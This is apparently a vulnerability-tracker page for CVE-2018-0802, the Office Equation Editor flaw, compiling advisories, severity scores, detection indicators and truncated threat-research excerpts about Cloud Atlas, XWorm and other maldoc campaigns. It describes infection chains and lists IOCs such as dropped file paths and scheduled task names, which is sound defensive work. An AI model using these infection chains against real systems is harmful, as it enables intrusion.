CVE-2018-0802
published 2018-01-10CVE-2018-0802: Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allow a remote code execution vulnerability…
PriorityP185high7.8CVSS 3.1
AVLACLPRNUIRSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
93.29%
99.8th percentile
Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allow a remote code execution vulnerability due to the way objects are handled in memory, aka "Microsoft Office Memory Corruption Vulnerability". This CVE is unique from CVE-2018-0797 and CVE-2018-0812.
Affected
20 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | word | — | — |
| microsoft | word | — | — |
| microsoft | word | — | — |
| microsoft | word | — | — |
| msrc | microsoft_office_2007_service_pack_3 | — | — |
| msrc | microsoft_office_2010_service_pack_2 | — | — |
| msrc | microsoft_office_2013_service_pack_1 | — | — |
| msrc | microsoft_office_2016 | — | — |
| msrc | microsoft_office_2016_click-to-run_for_32-bit_editions | — | — |
| msrc | microsoft_office_2016_click-to-run_for_64-bit_editions | — | — |
| msrc | microsoft_office_compatibility_pack_service_pack_3 | — | — |
| msrc | microsoft_word_2007_service_pack_3 | — | — |
| msrc | microsoft_word_2010_service_pack_2 | — | — |
| msrc | microsoft_word_2013_rt_service_pack_1 | — | — |
| msrc | microsoft_word_2013_service_pack_1 | — | — |
| msrc | microsoft_word_2016 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →CVE-2018-0802 is exploited via Microsoft Equation Editor (EQNEDT32.EXE); detect spawning of EQNEDT32.EXE from Word or Excel processes, especially when it subsequently launches network connections or drops files. ↗
- →Malicious RTF documents exploiting CVE-2018-0802 embed OLE objects with class name 'Equation 3.0'; hunt for RTF files containing this OLE class name. ↗
- →Exploitation of CVE-2018-0802 via Royal Road (8.t RTF exploit builder) weaponized RTF files; detect RTF attachments crafted with this builder, which are known to exploit CVE-2017-11882, CVE-2018-0802, and CVE-2018-0798. ↗
- →Post-exploitation: monitor for creation of scheduled tasks named 'Rdx' and 'RdxFac' running every five minutes, and creation of folder 'RdxFact' in the Windows tasks folder. ↗
- →Post-exploitation: monitor for RdxFactory.exe dropped into the public user profile's music folder (C:\Users\Public\Music\RdxFactory.exe). ↗
- →Bitter APT emails sent via JavaMail with Zimbra web client version 8.8.15_GA_4101; this header string can be used to identify campaign-related phishing emails. ↗
- →Shellcode from CVE-2018-0802 exploitation creates folder C:\$Utf to stage the downloaded payload; monitor for creation of this unusual directory. ↗
- ·CVE-2018-0802 is frequently exploited alongside CVE-2017-11882 and CVE-2018-0798 in the same maldoc; detections and mitigations should account for all three vulnerabilities together, not just CVE-2018-0802 in isolation. ↗
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck8.8HIGH
cisa8.8HIGH
vendor_msrc7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Microsoft Office Memory Corruption Vulnerability
cisa·2021-11-03·CVSS 8.8
CVE-2018-0802 [HIGH] CWE-787 Microsoft Office Memory Corruption Vulnerability
Vulnerability: Microsoft Office Memory Corruption Vulnerability
Affected: Microsoft Office
Microsoft Office contains a memory corruption vulnerability due to the way objects are handled in memory. Successful exploitation allows for remote code execution in the context of the current user. This vulnerability is known to be chained with CVE-2018-0798.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-0802
Remediation Due Date: 2022-05-03
CISA
Microsoft Office Memory Corruption Vulnerability
cisa·2021-11-03·CVSS 8.8
CVE-2018-0798 [HIGH] CWE-787 Microsoft Office Memory Corruption Vulnerability
Vulnerability: Microsoft Office Memory Corruption Vulnerability
Affected: Microsoft Office
Microsoft Office contains a memory corruption vulnerability due to the way objects are handled in memory. Successful exploitation allows for remote code execution in the context of the current user. This vulnerability is known to be chained with CVE-2018-0802.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-0798
Remediation Due Date: 2022-05-03
Microsoft
Microsoft Office Memory Corruption Vulnerability
vendor_msrc·2018-01-09·CVSS 7.8
CVE-2018-0802 [HIGH] Microsoft Office Memory Corruption Vulnerability
Microsoft Office Memory Corruption Vulnerability
Description: A remote code execution vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
Exploitation of the vulnerability requires that a user open a specially crafted file with
GHSA
GHSA-x323-9hmm-gv8q: Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allow a remote code execution vulner
ghsa_unreviewed·2022-05-13·CVSS 7.8
CVE-2018-0802 [HIGH] CWE-787 GHSA-x323-9hmm-gv8q: Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allow a remote code execution vulner
Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allow a remote code execution vulnerability due to the way objects are handled in memory, aka "Microsoft Office Memory Corruption Vulnerability". This CVE is unique from CVE-2018-0797 and CVE-2018-0812.
VulnCheck
Microsoft Office Memory Corruption Vulnerability
vulncheck·2018·CVSS 8.8
CVE-2018-0798 [HIGH] CWE-787 Microsoft Office Memory Corruption Vulnerability
Microsoft Office Memory Corruption Vulnerability
Microsoft Office contains a memory corruption vulnerability due to the way objects are handled in memory. Successful exploitation allows for remote code execution in the context of the current user. This vulnerability is known to be chained with CVE-2018-0802.
Affected: Microsoft Office
Required Action: Apply updates per vendor instructions.
Exploitation References: https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/; https://www.africacybersecurityconference.com/document/CrowdStrike_GTR_2019.pdf; https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.p
VulnCheck
Microsoft Office Memory Corruption Vulnerability
vulncheck·2018·CVSS 8.8
CVE-2018-0802 [HIGH] CWE-787 Microsoft Office Memory Corruption Vulnerability
Microsoft Office Memory Corruption Vulnerability
Microsoft Office contains a memory corruption vulnerability due to the way objects are handled in memory. Successful exploitation allows for remote code execution in the context of the current user. This vulnerability is known to be chained with CVE-2018-0798.
Affected: Microsoft Office
Required Action: Apply updates per vendor instructions.
Exploitation References: https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2018-Jan; https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.freebuf.com/column/159865.html; https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf; https://www.fireeye.com/blog/threat-research/2018/02/apt37-overlooked-north-korean-actor.html; https://www.trendmicro.com/en_u
No detection rules found.
No public exploits indexed.
Securelist
Cloud Atlas activity in the second half of 2025 and early 2026: new tools and a new payload
blogs_securelist·2026-05-22·CVSS 7.8
CVE-2018-0802 [HIGH] Cloud Atlas activity in the second half of 2025 and early 2026: new tools and a new payload
Kaspersky
Table of Contents
Technical details
Initial infection
Fixed.ps1 (loader)
Fixed.ps1::Payload (VBCloud dropper)
Fixed.ps1::Payload (PowerShower)
PowerShower::Payload (credential grabber)
Multi-user RDP by patching termsrv.dll
Reverse SSH tunneling
Patched OpenSSH
RevSocks
Tor tunneling
PowerCloud
Browser checker
Victims
Conclusion
Indicators of compromise
Domains and IPs
File paths
Authors
Kaspersky
In 2025, we observed pervasive SSH tunnel activity, which has remained active into 2026, affecting many government organizations and commercial companies in Russia and Belarus. Behind some of this activity is Cloud Atlas, a group we have known since 2014 . During our investigation, we identified new tools used by this group, as well as indicators of compromise.
Th
Securelist
Exploits and vulnerabilities in Q1 2026
blogs_securelist·2026-05-07·CVSS 7.8
CVE-2026-21519 [HIGH] Exploits and vulnerabilities in Q1 2026
Alexander Kolesnikov
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
C2 frameworks
Notable vulnerabilities
CVE-2026-21519: Desktop Window Manager vulnerability
RegPwn (CVE-2026-21533): a system settings access control vulnerability
CVE-2026-21514: a Microsoft Office vulnerability
Clawdbot (CVE-2026-25253): an OpenClaw vulnerability
CVE-2026-34070: LangChain framework vulnerability
CVE-2026-22812: an OpenCode vulnerability
Conclusion and advice
Authors
Alexander Kolesnikov
During Q1 2026, the exploit kits leveraged by threat actors to target user systems expanded once again, incorporating new exploits for the Microsoft Off
Securelist
Vulnerability landscape in Q4 2025
blogs_securelist·2026-03-06
Vulnerability landscape in Q4 2025
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- C2 frameworks
- Notable vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
The fourth quarter of 2025 went down as one of the most intense periods on record for high-profile, critical vulnerability disclosures, hitting popular libraries and mainstream applications. Several of these vulnerabilities were picked up by attackers and exploited in the wild almost immediately.
In this report, we dive into the statistics on published vulnerabilities and exploits, as well as the known vulnerabilities leveraged with popular C2 frameworks throughout Q4 2025.
## Statistics on registered vulnerabilities
This section contains statistics on regis
Securelist
Exploits and vulnerabilities in Q4 2025
blogs_securelist·2026-03-06·CVSS 7.8
CVE-2025-55182 [HIGH] Exploits and vulnerabilities in Q4 2025
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
C2 frameworks
Notable vulnerabilities
React2Shell (CVE-2025-55182): a vulnerability in React Server Components
CVE-2025-54100: command injection during the execution of curl (Invoke-WebRequest)
CVE-2025-11001: a vulnerability in 7-Zip
RediShell (CVE-2025-49844): a vulnerability in Redis
CVE-2025-24990: a vulnerability in the ltmdm64.sys driver
CVE-2025-59287: a vulnerability in Windows Server Update Services (WSUS)
Conclusion and advice
Authors
Alexander Kolesnikov
The fourth quarter of 2025 went down as one of the most intense periods on record for high-profile, critical vul
Fortinet
Deep Dive into New XWorm Campaign Utilizing Multiple-Themed Phishing Emails | FortiGuard Labs
blogs_fortinet·2026-02-10·CVSS 7.8
[HIGH] Deep Dive into New XWorm Campaign Utilizing Multiple-Themed Phishing Emails | FortiGuard Labs
FortiGuard Labs Threat Research
# Deep Dive into New XWorm Campaign Utilizing Multiple-Themed Phishing Emails
Technical analysis of a multi-stage phishing campaign delivering XWorm RAT through malicious Excel attachments, fileless .NET loaders, and process hollowing
FortiGuard Security Portfolio
2025 Threat Landscape Report
By
Xiaopeng Zhang
| February 10, 2026
- Article Contents
By
Xiaopeng Zhang
| February 10, 2026
Affected Platforms: Microsoft Windows
Impacted Users: Windows Users
Impact: Full remote control of the victim’s computer
Severity Level: High
## Background
FortiGuard Labs recently captured a phishing campaign in the wild delivering a new variant of XWorm.
XWorm is a multi-functional Remote Access Trojan (RAT) first identified in 2022 that remains actively
Fortinet
Deep Dive into New XWorm Campaign Utilizing Multiple-Themed Phishing Emails | FortiGuard Labs
blogs_fortinet·2026-02-10·CVSS 7.8
CVE-2018-0802 [HIGH] Deep Dive into New XWorm Campaign Utilizing Multiple-Themed Phishing Emails | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Deep Dive into New XWorm Campaign Utilizing Multiple-Themed Phishing Emails
Technical analysis of a multi-stage phishing campaign delivering XWorm RAT through malicious Excel attachments, fileless .NET loaders, and process hollowing
FORTIGUARD SECURITY PORTFOLIO 2025 THREAT LANDSCAPE REPORT
Background
Infection Chain
Multiple-Themed Phishing Emails
Crafted Excel File to Exploit
CVE-2018-0802
Analyzing the HTA File
The Fileless .NET Module and Process Hollowing
The XWorm Payload File
Dissecting the Packet
XWorm Control Commands
XWorm Plugins
XWorm Features
System Control:
Attacks:
XWorm RAT Management:
Other Capabilities:
Summary
Fortinet Protections
URLs:
C2 Server:
Relevant Sample SHA-256:
By Xiaopeng Zhang | February 10, 2026
Affected Platforms: Micros
Securelist
Cloud Atlas activity in the first half of 2025: what changed
blogs_securelist·2025-12-19·CVSS 7.8
[HIGH] Cloud Atlas activity in the first half of 2025: what changed
Table of Contents
Technical details
Initial infection
VBShower
VBShower::Backdoor
VBShower::Payload (1)
VBShower::Payload (2)
VBShower::Payload (3)
VBShower::Payload (4)
VBShower::Payload (5)
VBShower::Payload (6)
VBShower::Payload (7)
VBShower::Payload (8)
VBShower::Payload (9)
VBCloud
VBCloud::Launcher
VBCloud::Backdoor
VBCloud::Payload (FileGrabber)
PowerShower
PowerShower::Payload (1)
PowerShower::Payload (2)
CloudAtlas
CloudAtlas::Plugin (FileGrabber)
CloudAtlas::Plugin (Common)
CloudAtlas::Plugin (PasswordStealer)
CloudAtlas::Plugin (InfoCollector)
Python script
Victims
Conclusion
Indicators of compromise
File hashes
Domains and IPs
Authors
Kaspersky
Known since 2014, the Cloud Atlas group targets countries in Eastern Europe and Central Asia. Infecti
Securelist
New Cloud Atlas APT campaign
blogs_securelist·2025-12-19·CVSS 7.8
CVE-2018-0802 [HIGH] New Cloud Atlas APT campaign
Table of Contents
- Technical details
- Victims
- Conclusion
- Indicators of compromise
Authors
- Kaspersky
Known since 2014, the Cloud Atlas group targets countries in Eastern Europe and Central Asia. Infections occur via phishing emails containing a malicious document that exploits an old vulnerability in the Microsoft Office Equation Editor process (CVE-2018-0802) to download and execute malicious code. In this report, we describe the infection chain and tools that the group used in the first half of 2025, with particular focus on previously undescribed implants.
Additional information about this threat, including indicators of compromise, is available to customers of the Kaspersky Intelligence Reporting Service. Contact: [email protected].
## Technical details
### Initi
Securelist
Exploits and vulnerabilities in Q3 2025
blogs_securelist·2025-12-03·CVSS 7.8
CVE-2025-49704 [HIGH] Exploits and vulnerabilities in Q3 2025
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
C2 frameworks
Interesting vulnerabilities
ToolShell (CVE-2025-49704 and CVE-2025-49706, CVE-2025-53770 and CVE-2025-53771): insecure deserialization and an authentication bypass
CVE-2025-8088: a directory traversal vulnerability in WinRAR
CVE-2025-41244: a privilege escalation vulnerability in VMware Aria Operations and VMware Tools
Conclusion and advice
Authors
Alexander Kolesnikov
In the third quarter, attackers continued to exploit security flaws in WinRAR, while the total number of registered vulnerabilities grew again. In this report, we examine statistics on published vuln
Securelist
Analyzing the vulnerability landscape in Q3 2025
blogs_securelist·2025-12-03
Analyzing the vulnerability landscape in Q3 2025
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- C2 frameworks
- Interesting vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
In the third quarter, attackers continued to exploit security flaws in WinRAR, while the total number of registered vulnerabilities grew again. In this report, we examine statistics on published vulnerabilities and exploits, the most common security issues impacting Windows and Linux, and the vulnerabilities being leveraged in APT attacks that lead to the launch of widespread C2 frameworks. The report utilizes anonymized Kaspersky Security Network data, which was consensually provided by our users, as well as information from open sources.
## Statistics on
Securelist
Exploits and vulnerabilities in Q2 2025
blogs_securelist·2025-08-27·CVSS 8.2
CVE-2025-32433 [HIGH] Exploits and vulnerabilities in Q2 2025
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
C2 frameworks
Interesting vulnerabilities
CVE-2025-32433: vulnerability in the SSH server, part of the Erlang/OTP framework
CVE-2025-6218: directory traversal vulnerability in WinRAR
CVE-2025-3052: insecure data access vulnerability in NVRAM, allowing bypass of UEFI signature checks
CVE-2025-49113: insecure deserialization vulnerability in Roundcube Webmail
CVE-2025-1533: stack overflow vulnerability in the AsIO3.sys driver
Conclusion and advice
Authors
Alexander Kolesnikov
Vulnerability registrations in Q2 2025 proved to be quite dynamic. Vulnerabilities that were published i
Securelist
Vulnerability landscape analysis for Q2 2025
blogs_securelist·2025-08-27
Vulnerability landscape analysis for Q2 2025
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- C2 frameworks
- Interesting vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
Vulnerability registrations in Q2 2025 proved to be quite dynamic. Vulnerabilities that were published impact the security of nearly every computer subsystem: UEFI, drivers, operating systems, browsers, as well as user and web applications. Based on our analysis, threat actors continue to leverage vulnerabilities in real-world attacks as a means of gaining access to user systems, just like in previous periods.
This report also describes known vulnerabilities used with popular C2 frameworks during the first half of 2025.
## Statistics on registered vulnera
Securelist
Vulnerability landscape analysis for Q1 2025
blogs_securelist·2025-05-30
Vulnerability landscape analysis for Q1 2025
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- Interesting vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
The first quarter of 2025 saw the continued publication of vulnerabilities discovered and fixed in 2024, as some researchers were previously unable to disclose the details. This partially shifted the focus away from vulnerabilities that received new CVE-2025-NNNNN identifiers. The nature of the CVE assignment process can result in a notable delay between problem investigation and patch release, which is mitigated by reserving a CVE ID early in the process. As for trends in vulnerability exploitation, we are seeing increasing rates of attacks targeting older operating syste
Securelist
Exploits and vulnerabilities in Q1 2025
blogs_securelist·2025-05-30·CVSS 7.8
CVE-2025-21333 [HIGH] Exploits and vulnerabilities in Q1 2025
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
Interesting vulnerabilities
ZDI-CAN-25373: a vulnerability in Windows that affects how LNK files are displayed
CVE-2025-21333: a heap buffer overflow vulnerability in the vkrnlintvsp.sys driver
CVE-2025-24071: a NetNTLM hash leakage vulnerability in the file system indexer
Conclusion and advice
Authors
Alexander Kolesnikov
The first quarter of 2025 saw the continued publication of vulnerabilities discovered and fixed in 2024, as some researchers were previously unable to disclose the details. This partially shifted the focus away from vulnerabilities that received new CVE-2025-NN
Securelist
Vulnerability landscape analysis for Q4 2024
blogs_securelist·2025-02-26
Vulnerability landscape analysis for Q4 2024
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- Interesting vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
Q4 2024 saw fewer published exploits for Windows and Linux compared to the first three quarters. Although the number of registered vulnerabilities continued to rise, the total number of Proof of Concept (PoC) instances decreased compared to 2023. Among notable techniques in Q4, attackers leveraged undocumented RPC interfaces and targeted the Windows authentication mechanism.
## Statistics on registered vulnerabilities
This section contains statistics on registered vulnerabilities. Data is sourced from the CVE portal: cve.org.
Total number of registered vulnerabilities a
Securelist
Exploits and vulnerabilities in Q4 2024
blogs_securelist·2025-02-26·CVSS 6.5
CVE-2024-43572 [MEDIUM] Exploits and vulnerabilities in Q4 2024
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
Interesting vulnerabilities
CVE-2024-43572—Remote code execution vulnerability in Microsoft Management Console
CVE-2024-43451—NetNTLM hash disclosure vulnerability
CVE-2024-49039—Elevation of privilege vulnerability in Windows Task Scheduler
Conclusion and advice
Authors
Alexander Kolesnikov
Q4 2024 saw fewer published exploits for Windows and Linux compared to the first three quarters. Although the number of registered vulnerabilities continued to rise, the total number of Proof of Concept (PoC) instances decreased compared to 2023. Among notable techniques in Q4, attackers leve
Securelist
Cloud Atlas using a new backdoor, VBCloud, to steal data
blogs_securelist·2024-12-23·CVSS 7.8
CVE-2018-0802 [HIGH] Cloud Atlas using a new backdoor, VBCloud, to steal data
Table of Contents
- Introduction
- Technical details
- Geography of attacked users
- Conclusion
- Indicators of compromise
Authors
- Oleg Kupreev
## Introduction
Known since 2014, Cloud Atlas targets Eastern Europe and Central Asia. We’re shedding light on a previously undocumented toolset, which the group used heavily in 2024. Victims get infected via phishing emails containing a malicious document that exploits a vulnerability in the formula editor (CVE-2018-0802) to download and execute malware code. See below for the infection pattern.
Typical Cloud Atlas infection pattern
When opened, the document downloads a malicious template formatted as an RTF file from a remote server controlled by the attackers. It contains a formula editor exploit that downloads and runs an HTML Applica
Securelist
Cloud Atlas seen using a new tool in its attacks
blogs_securelist·2024-12-23·CVSS 7.8
[HIGH] Cloud Atlas seen using a new tool in its attacks
Table of Contents
Introduction
Technical details
HTA
VBShower
VBShower::Launcher
VBShower::Cleaner
VBShower::Backdoor
VBShower::Payload
PowerShower
VBCloud
Geography of attacked users
Conclusion
Indicators of compromise
Authors
Oleg Kupreev
## Introduction
Known since 2014, Cloud Atlas targets Eastern Europe and Central Asia. We’re shedding light on a previously undocumented toolset, which the group used heavily in 2024. Victims get infected via phishing emails containing a malicious document that exploits a vulnerability in the formula editor ( CVE-2018-0802 ) to download and execute malware code. See below for the infection pattern.
Typical Cloud Atlas infection pattern
When opened, the document downloads a malicious template formatted as an RTF file from a remote serv
Securelist
Exploits and vulnerabilities in Q3 2024
blogs_securelist·2024-12-06·CVSS 8.1
CVE-2024-47177 [HIGH] Exploits and vulnerabilities in Q3 2024
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most prevalent exploits
Vulnerability exploitation in APT attacks
Interesting vulnerabilities
CVE-2024-47177 (CUPS filters)
CVE-2024-38112 (MSHTML Spoofing)
CVE-2024-6387 (regreSSHion)
CVE-2024-3183 (Free IPA)
CVE-2024-45519 (Zimbra)
CVE-2024-5290 (Ubuntu wpa_supplicant)
Conclusion and advice
Authors
Alexander Kolesnikov
Q3 2024 saw multiple vulnerabilities discovered in Windows and Linux subsystems that are not standard for cyberattacks. This is because operating system developers have been releasing new security mitigations for whole sets of vulnerabilities in commonly used subsystems. For example, a log integrity check is set to appear in the Co
Securelist
Analyzing the vulnerability landscape in Q3 2024
blogs_securelist·2024-12-06·CVSS 8.1
CVE-2024-47177 [HIGH] Analyzing the vulnerability landscape in Q3 2024
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- Interesting vulnerabilities
- CVE-2024-47177 (CUPS filters)
- CVE-2024-38112 (MSHTML Spoofing)
- CVE-2024-6387 (regreSSHion)
- CVE-2024-3183 (Free IPA)
- CVE-2024-45519 (Zimbra)
- CVE-2024-5290 (Ubuntu wpa_supplicant)
- Conclusion and advice
Authors
- Alexander Kolesnikov
Q3 2024 saw multiple vulnerabilities discovered in Windows and Linux subsystems that are not standard for cyberattacks. This is because operating system developers have been releasing new security mitigations for whole sets of vulnerabilities in commonly used subsystems. For example, a log integrity check is set to appear in the Common Log Filing System (CLFS) in Windows, so the number
Securelist
Exploits and vulnerabilities in Q2 2024
blogs_securelist·2024-08-21·CVSS 7.8
CVE-2024-26169 [HIGH] Exploits and vulnerabilities in Q2 2024
Table of Contents
Statistics on registered vulnerabilities
Vulnerability exploitation statistics
Windows and Linux vulnerability exploitation
Most common exploits
Vulnerability exploitation in APT attacks
Exploiting vulnerable drivers to attack operating systems
BYOVD attack tools
Interesting vulnerabilities
CVE-2024-26169 (WerKernel.sys)
CVE-2024-26229 (csc.sys)
CVE-2024-4577 (PHP CGI)
Takeaways and recommendations
Authors
Vitaly Morgunov
Alexander Kolesnikov
Q2 2024 was eventful in terms of new interesting vulnerabilities and exploitation techniques for applications and operating systems. Attacks through vulnerable drivers have become prevalent as a general means of privilege escalation in the operating system. Such attacks are notable in that the vulnerability does not h
Securelist
Analyzing the vulnerability landscape in Q2 2024
blogs_securelist·2024-08-21·CVSS 7.8
CVE-2024-26169 [HIGH] Analyzing the vulnerability landscape in Q2 2024
Table of Contents
- Statistics on registered vulnerabilities
- Vulnerability exploitation statistics
- Vulnerability exploitation in APT attacks
- Exploiting vulnerable drivers to attack operating systems
- Interesting vulnerabilities
- CVE-2024-26169 (WerKernel.sys)
- CVE-2024-26229 (csc.sys)
- CVE-2024-4577 (PHP CGI)
- Takeaways and recommendations
Authors
- Vitaly Morgunov
- Alexander Kolesnikov
Q2 2024 was eventful in terms of new interesting vulnerabilities and exploitation techniques for applications and operating systems. Attacks through vulnerable drivers have become prevalent as a general means of privilege escalation in the operating system. Such attacks are notable in that the vulnerability does not have to be fresh, since attackers themselves deliver unpatched drivers to t
Securelist
Spam and phishing in 2023
blogs_securelist·2024-03-07
Spam and phishing in 2023
Table of Contents
The year in figures
Phishing and scams in 2023
Hunting gamers
Out-of-the-blue winnings and refunds
Easy money
Cryptocurrency scams
Reeling in readers
Social networks and instant messaging under attack
Beating two-factor authentication
Artificial intelligence at the service of scammers
Spam in 2023
Scams
Cryptocurrency scams
Charity scams
Blackmail
Malicious attachments
List linking
Spear phishing and BEC attacks in 2023
Other email phishing trends in 2023
Obfuscation
QR codes
IPFS
Statistics: spam
Share of spam in email traffic
Countries and territories where spam originated
Malicious email attachments
Countries and territories targeted by malicious mailings
Statistics: phishing
Map of phishing attacks
Top-level domains
Organizations targete
Securelist
Kaspersky spam and phishing report for 2023
blogs_securelist·2024-03-07
Kaspersky spam and phishing report for 2023
Table of Contents
- The year in figures
- Phishing and scams in 2023
- Spam in 2023
- Spear phishing and BEC attacks in 2023
- Statistics: spam
- Statistics: phishing
- Conclusion
Authors
- Tatyana Kulikova
- Olga Altukhova
- Andrey Kovtun
- Irina Shimko
- Roman Dedenok
## The year in figures
- 45.60% of all email sent worldwide and 46.59% of all email sent in the Runet (the Russian web segment) was spam
- 31.45% of all spam email was sent from Russia
- Kaspersky Mail Anti-Virus blocked 135,980,457 malicious email attachments
- Our Anti-Phishing system thwarted 709,590,011 attempts to follow phishing links
- SafeMessaging feature in Kaspersky mobile solutions prevented more than 62,000 redirects via phishing links from Telegram
## Phishing and scams in 2023
### Hunting gamers
In 2
Checkpoint
12th February – Threat Intelligence Report
blogs_checkpoint·2024-02-12
CVE-2022-42475 12th February – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 12th February – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 12th February, please download our Threat_Intelligence Bulletin .
TOP ATTACKS AND BREACHES
One of the largest unions in California, Service Employees International Union (SEIU) Local 1000, has confirmed a ransomware attack that led to network disruption. The LockBit ransomware gang has assumed responsibility, claiming to have stolen 308GB of data including sensitive employee information such as Social Securit
Checkpoint
Maldocs of Word and Excel: Vigor of the Ages
blogs_checkpoint·2024-02-08·CVSS 7.8
CVE-2017-11882 [HIGH] Maldocs of Word and Excel: Vigor of the Ages
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## Maldocs of Word and Excel: Vigor of the Ages
Research by: Raman Ladutska
We chose a fantasy decoration style at certain points of the article to attract attention to the described proble
Securelist
PC malware statistics, Q3 2023
blogs_securelist·2023-12-01
PC malware statistics, Q3 2023
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used in cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks on IoT honeypots
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q3 2023
- IT threat evolution in Q3 2023. Non-mobile statistics
- IT threat evolution in Q3 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3 2023:
- Kaspersky solutions blocked 694,400,301 attacks from online resources across the globe.
- A total of 169,194,807 unique links were recognized as malicious by Web Anti-Virus
Securelist
IT threat evolution in Q3 2023. Non-mobile statistics
blogs_securelist·2023-12-01
IT threat evolution in Q3 2023. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
Vulnerability exploitation
More attacks on healthcare
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used in cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks on IoT honeypots
Attacks via web resources
Countries and territories that serve as sourc
Fortinet
New Agent Tesla Variant Being Spread by Crafted Excel Document | FortiGuard Labs
blogs_fortinet·2023-09-05·CVSS 7.8
[HIGH] New Agent Tesla Variant Being Spread by Crafted Excel Document | FortiGuard Labs
